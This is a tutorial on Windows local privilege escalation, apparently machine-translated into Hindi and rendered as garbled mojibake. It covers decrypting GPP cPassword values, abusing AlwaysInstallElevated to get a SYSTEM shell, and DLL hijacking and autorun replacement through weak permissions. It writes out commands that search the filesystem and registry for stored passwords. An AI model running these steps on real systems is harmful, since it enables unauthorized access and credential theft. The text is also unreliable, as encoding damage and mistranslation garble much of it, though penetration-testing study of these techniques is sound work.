Base64 рд╡рд┐рд╢реЗрд╖рддрд╛рдПрдБ рдпрд╣ рд╣реИрдВ рдХрд┐ рдЗрд╕рдХреА рд▓рдВрдмрд╛рдИ 4. рдХреА рдПрдХ рд╕реЗ рдЕрдзрд┐рдХ рд╣реЛрдиреА рдЪрд╛рд╣рд┐рдПред рдЗрд╕рд▓рд┐рдП, рд╣рдо 4 рдХреЗ рдмреНрд▓реЙрдХ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░рддреЗ рд╣реИрдВ, рдФрд░ рдпрджрд┐ рдЕрдВрддрд┐рдо рдмреНрд▓реЙрдХ рдореЗрдВ рдкрд░реНрдпрд╛рдкреНрдд рд╡рд░реНрдг рдирд╣реАрдВ рд╣реИрдВ, рддреЛ рд╣рдо рд▓рд╛рдкрддрд╛ рд╡рд░реНрдгреЛрдВ рдХреЛ "=" рдХреЗ рд╕рд╛рде рдЬреЛрдбрд╝рддреЗ рд╣реИрдВред
рдореБрдЭреЗ 2 "=" рдорд┐рд▓реЗред



рдЕрдЧрд▓рд╛ рд╣рдо рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░рддреЗ рд╣реИрдВред рдЙрдкрд░реЛрдХреНрдд рдХреБрдВрдЬреА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ред



рд╣рдо рд╡рд░реНрдгреЛрдВ рдХреЛ рдЕрд▓рдЧ рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рдЕрддрд┐рд░рд┐рдХреНрдд рдмрд┐рдВрджреБ рд╣рдЯрд╛рддреЗ рд╣реИрдВ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВред

Group.xml рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдпрд╣рд╛рдВ рдХреБрдЫ рдЕрдиреНрдп рдиреАрддрд┐рдЧрдд рдкреНрд░рд╛рдердорд┐рдХрддрд╛ рд╡рд╛рд▓реА рдлрд╛рдЗрд▓реЗрдВ рд╣реИрдВ рдЬрд┐рдирдореЗрдВ cPassword рд╡рд┐рд╢реЗрд╖рддрд╛рдУрдВ рдХрд╛ рдПрдХ рдЕрддрд┐рд░рд┐рдХреНрдд рд╕реЗрдЯ рд╣реЛ рд╕рдХрддрд╛ рд╣реИ:

  • рд╕реЗрд╡рд╛рдПрдБ \ Services.xml
  • рд╢реЗрдбреНрдпреВрд▓ рдХрд┐рдП рдЧрдП рдХрд╛рд░реНрдп \ ScheduledTasks.xml
  • рдкреНрд░рд┐рдВрдЯрд░
  • рдбреНрд░рд╛рдЗрд╡ \ рдбреНрд░рд╛рдЗрд╡ред Xml
  • рдбреЗрдЯрд╛ рд╕реНрд░реЛрдд \ DataSources.xml

рд╣рд╛рд▓рд╛рдВрдХрд┐, рд╣рдо рд╕рднреА рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд╕рдорд╛рдзрд╛рдиреЛрдВ рд╕реЗ рдкреНрдпрд╛рд░ рдХрд░рддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рд╣рдо рдЬрд┐рддрдиреА рдЬрд▓реНрджреА рд╣реЛ рд╕рдХреЗ рдлрд┐рдирд┐рд╢ рд▓рд╛рдЗрди рдкрд░ рдкрд╣реБрдВрдЪ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╣рд╛рдВ рджреЛ рдореБрдЦреНрдп рд╡рд┐рдХрд▓реНрдк рд╣реИрдВ, рдЬреЛ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рд╢реЗрд▓ / рдПрдХреНрд╕реЗрд╕ рдХреЗ рдкреНрд░рдХрд╛рд░ рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддрд╛ рд╣реИред рдПрдХ рдореЗрдЯрд╕реНрдкреНрд▓реЛрдЗрдЯ рдореЙрдбреНрдпреВрд▓ рд╣реИ рдЬрд┐рд╕реЗ рдПрдХ рд╕реНрдерд╛рдкрд┐рдд рд╕рддреНрд░ (https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдпрд╛ рдЖрдк Get-GPPassword рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЬреЛ PowerSploit рдХрд╛ рд╣рд┐рд╕реНрд╕рд╛ рд╣реИред

рдареАрдХ рд╣реИ, рдЕрдЧрд▓реЗ рд╣рдо рдЕрдЬреАрдм рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдкреИрд░рд╛рдореАрдЯрд░ "AlwaysInstallElevated" рдХреЗ рд▓рд┐рдП рдЦреЛрдЬ рдХрд░реЗрдВрдЧреЗред рдпрд╣ рд╡рд┐рдХрд▓реНрдк рдЕрдкреНрд░рднрд╛рд╡реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ NT AUTHORITY \ SYSTEM рд╕реЗ .msi рдлрд╛рдЗрд▓реЗрдВ рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред

рдЗрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдореЗрдВ рдпрд╣ рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░рдирд╛ рд╣реЛрдЧрд╛ рдХрд┐ рджреЛрдиреЛрдВ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА рд╕реНрдерд╛рдкрд┐рдд рд╣реИрдВ, рдФрд░ рдпрджрд┐ рдРрд╕рд╛ рд╣реИ, рддреЛ рд╣рдо рдПрдХ рд╕рд┐рд╕реНрдЯрдо рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдХреА рдЬрд╛рдБрдЪ рдХрд░реЗрдВ:

 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 

 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

Metasploit рдореЗрдВ рдПрдХ рд╡рд┐рд╢реЗрд╖ рдореЙрдбреНрдпреВрд▓ рд╢реЛрд╖рдг / рд╡рд┐рдВрдбреЛрдЬрд╝ / рд▓реЛрдХрд▓ / рд╣рдореЗрд╢рд╛_рд╕реНрдерд╛рдкрдирд╛ / рдХреЛрдбрд┐рдд рд╢рд╛рдорд┐рд▓ рд╣реИ, рдЬреЛ рдЗрд╕рдореЗрдВ рдирд┐рд░реНрдорд┐рдд рдПрдХ рд╡рд┐рд╢реЗрд╖ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓ рдХреЗ рд╕рд╛рде рдПрдХ MSI рдлрд╝рд╛рдЗрд▓ рдмрдирд╛рддрд╛ рд╣реИ, рдЬрд┐рд╕реЗ рд╕рд┐рд╕реНрдЯрдо рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдЗрдВрд╕реНрдЯреЙрд▓рд░ рджреНрд╡рд╛рд░рд╛ рдирд┐рдХрд╛рд▓рд╛ рдФрд░ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЗрд╕рдХреЗ рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рдмрд╛рдж, рдПрдордПрд╕рдЖрдИ рдлрд╝рд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдХрд╛рд░реНрдпреЛрдВ рдХреЗ рдкрдВрдЬреАрдХрд░рдг рдХреЛ рд░реЛрдХрдиреЗ рдХреЗ рд▓рд┐рдП рд╕реНрдерд╛рдкрдирд╛ рдХреЛ рд░реЛрдХ рджреЗрддреА рд╣реИред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдпрджрд┐ рдЖрдк / рдЪреБрдк рд╕реНрд╡рд┐рдЪ рдХреЗ рд╕рд╛рде рдЗрдВрд╕реНрдЯреЙрд▓реЗрд╢рди рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдЖрдкрдХреЛ рдПрдХ рддреНрд░реБрдЯрд┐ рднреА рдирд╣реАрдВ рдорд┐рд▓реЗрдЧреАред

рдЦреИрд░, рд╕рд┐рд╕реНрдЯрдо рдкрд░ рдХреБрдЫ рдЙрдкрдпреЛрдЧреА рдЦреЛрдЬ рдЖрджреЗрд╢:

рдиреАрдЪреЗ рджрд┐рдпрд╛ рдЧрдпрд╛ рдХрдорд╛рдВрдб рд╡рд┐рд╢рд┐рд╖реНрдЯ рдХреАрд╡рд░реНрдб рд╡рд╛рд▓реЗ рдлрд╝рд╛рдЗрд▓ рдирд╛рдореЛрдВ рдХреЗ рд▓рд┐рдП рдлрд╝рд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдЦреЛрдЬреЗрдЧрд╛ред рдЖрдк рдХрд┐рд╕реА рднреА рд╕рдВрдЦреНрдпрд╛ рдореЗрдВ рдХреАрд╡рд░реНрдб рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

 dir /s *pass* == *cred* == *vnc* == *.config*

рдХреАрд╡рд░реНрдб рджреНрд╡рд╛рд░рд╛ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдХрд╛рд░реЛрдВ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬ рдХрд░рдирд╛, рдпрд╣ рдХрдорд╛рдВрдб рдмрд╣реБрдд рдЕрдзрд┐рдХ рдЖрдЙрдЯрдкреБрдЯ рдЙрддреНрдкрдиреНрди рдХрд░ рд╕рдХрддрд╛ рд╣реИред

 findstr /si password *.xml *.ini *.txt

рдЗрд╕реА рддрд░рд╣, рдиреАрдЪреЗ рджрд┐рдП рдЧрдП рджреЛ рдЖрджреЗрд╢реЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХреАрд╡рд░реНрдб рдХреЗ рд▓рд┐рдП рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреЛ рдкрдХрдбрд╝рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ, "рдкрд╛рд╕рд╡рд░реНрдб"ред

 reg query HKLM /f password /t REG_SZ /s 

 reg query HKCU /f password /t REG_SZ /s

рдлрд┐рд▓рд╣рд╛рд▓, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рд╕рд┐рд╕реНрдЯрдо рдХреЛ рд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдкрд░реНрдпрд╛рдкреНрдд рд╣реИред рд▓реЗрдХрд┐рди рд╡рд╛рдВрдЫрд┐рдд рдкрд░рд┐рдгрд╛рдо рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреБрдЫ рдФрд░ рд▓рдХреНрд╖рд┐рдд рд╣рдорд▓реЗ рд╣реИрдВ: рд╣рдо рдлрд╝рд╛рдЗрд▓реЛрдВ рдФрд░ рдлрд╝реЛрд▓реНрдбрд░реЛрдВ рдХреЗ рд▓рд┐рдП рд╡рд┐рдВрдбреЛрдЬ рд╕реЗрд╡рд╛рдУрдВ рдФрд░ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЛ рджреЗрдЦреЗрдВрдЧреЗред рдпрд╣рд╛рдВ рд╣рдорд╛рд░рд╛ рд▓рдХреНрд╖реНрдп рд╕рддреНрд░ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдХрдордЬреЛрд░ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рд╣реИред

рд╣рдо рдмрд╣реБрдд рд╕рд╛рд░реЗ рдПрдХреНрд╕реЗрд╕ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВрдЧреЗ, рдПрдХреНрд╕реЗрд╕рдЪреЗрдХред Exe, рдЬреЛ Microsoft Sysinternals Suite рдХрд╛ рдПрдХ рдЙрдкрдХрд░рдг рд╣реИ, рдЗрд╕рд╕реЗ рд╣рдореЗрдВ рдорджрдж рдорд┐рд▓реЗрдЧреАред Microsoft Sysinternals рдореЗрдВ рдХрдИ рдмреЗрд╣рддрд░реАрди рдЙрдкрдХрд░рдг рд╣реИрдВред рдкреИрдХреЗрдЬ рдХреЛ Microsoft рддрдХрдиреАрдХреА рд╡реЗрдмрд╕рд╛рдЗрдЯ (https://docs.microsoft.com/ru-ru/sysinternals/downloads/sysinternals-suite) рд╕реЗ рдбрд╛рдЙрдирд▓реЛрдб рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

рд╣рдо рдПрдХреНрд╕реЗрд╕рдЪреЗрдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рддреНрдпреЗрдХ рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╕реНрддрд░ рдХреА рдЬрд╛рдВрдЪ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рд╣рдо рдЙрди рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЛ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдкреНрд░рддреНрдпреЗрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕реНрддрд░ рдХреЗ рдкрд╛рд╕ рд╣реИрдВред



рдПрдХреНрд╕реЗрд╕рдЪреЗрдХ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдЬрд╛рдВрдЪ рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдХрд┐ рдХреНрдпрд╛ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдХрд┐рд╕реА рд╡рд┐рд╢рд┐рд╖реНрдЯ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕реНрддрд░ рдХреЗ рд╕рд╛рде рд╡рд┐рдВрдбреЛрдЬ рд╕реЗрд╡рд╛ рддрдХ рдкрд╣реБрдВрдЪ рд╣реИ рдпрд╛ рдирд╣реАрдВред рдПрдХ рдирд┐рдпрдо рдХреЗ рд░реВрдк рдореЗрдВ, рдХрдо рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ, рд╣рдо "рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛" рдХреА рдЬрд╛рдВрдЪ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВред рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░реЗрдВ рдХрд┐ рдЖрдк рдХрд┐рд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рдореВрд╣ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╣реИрдВред

-c рдирд╛рдо рдПрдХ рд╡рд┐рдВрдбреЛрдЬ рд╕реЗрд╡рд╛ рд╣реИ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП ssdpsrv (рд╕рднреА рд╕реЗрд╡рд╛рдУрдВ рдХреЛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП "*" рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░реЗрдВ)
-d рдХреЗрд╡рд▓ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛
-рдИ рдХреЗрд╡рд▓ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░реЗрдВ (рдХреЗрд╡рд▓ Windows Vista)
-k рдирд╛рдо рдПрдХ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА рд╣реИ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, hklm \ рд╕реЙрдлреНрдЯрд╡реЗрдпрд░
-n рдХреЗрд╡рд▓ рдЙрди рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдХреЛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░реЗрдВ рдЬрд┐рдирдореЗрдВ рдПрдХреНрд╕реЗрд╕ рдирд┐рдпрдо рдирд╣реАрдВ рд╣реИрдВ
-p рдирд╛рдо рдпрд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛ (PID) рдирд╛рдо рдХреЗ рд░реВрдк рдореЗрдВ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП cmd.exe (рд╕рднреА рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЛ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдирд╛рдо рдХреЗ рд░реВрдк рдореЗрдВ "*" рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░реЗрдВ)
-q Omit рд╣реИрдбрд░
-r рдХреЗрд╡рд▓ рдЙрди рд╡рд╕реНрддреБрдУрдВ рдХреЛ рдкреНрд░рд┐рдВрдЯ рдХрд░реЗрдВ рдЬрд┐рдирдХреА рдкрд╣реБрдВрдЪ рдкрдврд╝реА рдЧрдИ рд╣реИ
-рдПрд╕ рдкреБрдирд░рд╛рд╡рд░реНрддреА рдкреНрд░рд╕рдВрд╕реНрдХрд░рдг
-рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд┐рдВрдЯ рдХрд░реЗрдВ
-W рдХреЗрд╡рд▓ рдЙрди рд╡рд╕реНрддреБрдУрдВ рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░реЗрдВ рдЬрд┐рдирдХреЗ рдкрд╛рд╕ рдкрд╣реБрдВрдЪ рд╣реИ



рдПрдХ рдФрд░ рджрд┐рд▓рдЪрд╕реНрдк рдЖрджреЗрд╢ рднреА рд╣реИ:

 autorunsc.exe -a | findstr /n /R "File\ not\ found"

рдЖрдкрдХреЛ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдПрдХ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐ рдЦреЛрдЬрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ рдЬреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рд▓реЙрдиреНрдЪ рдХреА рдЧрдИ рдереА, рд▓реЗрдХрд┐рди рд╕рд┐рд╕реНрдЯрдо рд╕реЗ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдЧрд╛рдпрдм рд╣реИред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд░рд┐рдХреЙрд░реНрдб рдЧрд▓рдд рд╣реЛ рд╕рдХрддрд╛ рд╣реИ, рддреЛ рд╕реЗрд╡рд╛ рдХреЛ рдЧрд▓рдд рддрд░реАрдХреЗ рд╕реЗ рд╣рдЯрд╛ рджрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред рдкреНрд░рддреНрдпреЗрдХ рдкреНрд░рд╛рд░рдВрдн рдореЗрдВ, рд╕рд┐рд╕реНрдЯрдо рдЗрд╕ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдЪрд▓рд╛рдиреЗ рдХрд╛ рдЕрд╕рдлрд▓ рдкреНрд░рдпрд╛рд╕ рдХрд░рддрд╛ рд╣реИред рдЕрдкрдиреЗ рдЕрдзрд┐рдХрд╛рд░ рдХрд╛ рд╡рд┐рд╕реНрддрд╛рд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдХрд╛ рднреА рд▓рд╛рдн рдЙрдард╛ рд╕рдХрддреЗ рд╣реИрдВред рдмрд╕ рдЗрд╕ рдлрд╝рд╛рдЗрд▓ рдХреЛ рд╣рдорд╛рд░реЗ рд▓рд┐рдП рд╕реНрдерд╛рдирд╛рдкрдиреНрди рдХрд░реЗрдВред

рдЕрдЧрд▓рд╛, рд╣рдо рджреЛ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░рддреЗ рд╣реИрдВ:

рдкрд╣рд▓рд╛: рдЧреНрд░реЗрд╡рд╣рд╛рдерд╣реИрдХрд░ рд╕реЗ рдкрд░рд╡реЗрдЬ рджреНрд╡рд╛рд░рд╛ рд▓рд┐рдЦреЗ рдЧрдП рдкреЛрд╕реНрдЯ рдХреЗ рдкрд░рд┐рдгрд╛рдореЛрдВ рдХреЛ рджреЛрд╣рд░рд╛рдПрдВ; "рдХрдордЬреЛрд░ рдлрд╝реЛрд▓реНрдбрд░ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХрд╛ рджреЛрд╣рди рдХрд░рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рд╡рд┐рд╕реНрддрд╛рд░" (http://www.greyhathacker.net/?p=738)ред

рдпрд╣ рдЙрджрд╛рд╣рд░рдг dll рдХреЗ рдЕрдкрд╣рд░рдг рдХрд╛ рдПрдХ рд╡рд┐рд╢реЗрд╖ рдорд╛рдорд▓рд╛ рд╣реИред рдХрд╛рд░реНрдпрдХреНрд░рдо рдЖрдорддреМрд░ рдкрд░ рдЕрдкрдиреЗ рджрдо рдкрд░ рдХрд╛рдо рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЙрдирдХреЗ рдкрд╛рд╕ рдХрдИ рд╕рдВрд╕рд╛рдзрди рд╣реИрдВ рдЬреЛ рдЙрдиреНрд╣реЗрдВ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ (рдореБрдЦреНрдп рд░реВрдк рд╕реЗ рдбреАрдПрд▓, рдмрд▓реНрдХрд┐ рдЕрдкрдиреА рдлрд╛рдЗрд▓реЗрдВ рднреА)ред рдпрджрд┐ рдХреЛрдИ рдкреНрд░реЛрдЧреНрд░рд╛рдо рдпрд╛ рд╕реЗрд╡рд╛ рдХрд┐рд╕реА рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╕реЗ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рддреА рд╣реИ, рдЬрд┐рд╕ рдкрд░ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдкрд╣реБрдВрдЪ рд╣реИ, рддреЛ рд╣рдо рдЗрд╕реЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рде рдПрдХ рд╢реЗрд▓ рд▓реЙрдиреНрдЪ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рджреБрд░реБрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬрд┐рд╕рдХреЗ рддрд╣рдд рдХрд╛рд░реНрдпрдХреНрд░рдо рдЪрд▓рддрд╛ рд╣реИред

рдЖрдорддреМрд░ рдкрд░, рдПрдХ рд╡рд┐рдВрдбреЛрдЬрд╝ рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдбреАрдПрд▓рдПрдл рдХреЛ рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдкреВрд░реНрд╡рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдЦреЛрдЬ рдкрде рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдЧрд╛, рдФрд░ рдпрд╣ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдХреНрд░рдо рдореЗрдВ рдЗрди рд░рд╛рд╕реНрддреЛрдВ рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдЧрд╛ред Dll рдЕрдкрд╣реГрдд рдЖрдорддреМрд░ рдкрд░ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг dll рдХреЛ рдЗрдирдореЗрдВ рд╕реЗ рдХрд┐рд╕реА рдПрдХ рдкрде рдкрд░ рд░рдЦрдХрд░ рд╣реЛрддрд╛ рд╣реИред рдпрд╣ рд╕рдорд╕реНрдпрд╛ рдЖрд╡рд╢реНрдпрдХ dll рдХреЗ рд▓рд┐рдП рдкреВрд░реНрдг рдирд┐рд░рдкреЗрдХреНрд╖ рдкрде рдХреЛ рдЗрдВрдЧрд┐рдд рдХрд░рдХреЗ рддрдп рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИред

Dll рдЦреЛрдЬ рдХреНрд░рдо:

  1. рд╡рд╣ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдЬрд┐рд╕рдореЗрдВ рд╕реЗ рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдЪрд▓ рд░рд╣рд╛ рд╣реИ
  2. 32-рдмрд┐рдЯ рд╕рд┐рд╕реНрдЯрдо рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ (C: \ Windows \ System32)
  3. 16-рдмрд┐рдЯ рд╕рд┐рд╕реНрдЯрдо рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ (C: \ Windows \ System)
  4. рд╡рд┐рдВрдбреЛрдЬ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ (C: \ Windows)
  5. рд╡рд░реНрддрдорд╛рди рдХрд╛рд░реНрдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ (CWD)
  6. PATH рдкрд░реНрдпрд╛рд╡рд░рдг рдЪрд░ (рд╕рд┐рд╕реНрдЯрдо рддрдм рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛) рдореЗрдВ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдПрдБ

рдХрднреА-рдХрднреА рдПрдкреНрд▓рд┐рдХреЗрд╢рди dll рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВ рдЬреЛ рдорд╢реАрди рдкрд░ рдЧрд╛рдпрдм рд╣реИрдВред рдпрд╣ рдХрдИ рдХрд╛рд░рдгреЛрдВ рд╕реЗ рд╣реЛ рд╕рдХрддрд╛ рд╣реИ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдпрджрд┐ dll рд▓рд╛рдЗрдмреНрд░реЗрд░реА рдХреЗрд╡рд▓ рдХреБрдЫ рдкреНрд▓рдЧ-рдЗрди рдпрд╛ рдШрдЯрдХреЛрдВ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╣реИ рдЬреЛ рд╕реНрдерд╛рдкрд┐рдд рдирд╣реАрдВ рд╣реИрдВред рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ, рдкрд░рд╡реЗрдЬрд╝ рдиреЗ рдкрд╛рдпрд╛ рдХрд┐ рдХреБрдЫ рд╡рд┐рдВрдбреЛрдЬрд╝ рд╕реЗрд╡рд╛рдПрдВ рдбреАрдПрд▓ рд▓рд╛рдЗрдмреНрд░реЗрд░реАрдЬрд╝ рдХреЛ рд▓реЛрдб рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд░рд╣реА рд╣реИрдВ рдЬреЛ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдореЗрдВ рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИрдВред

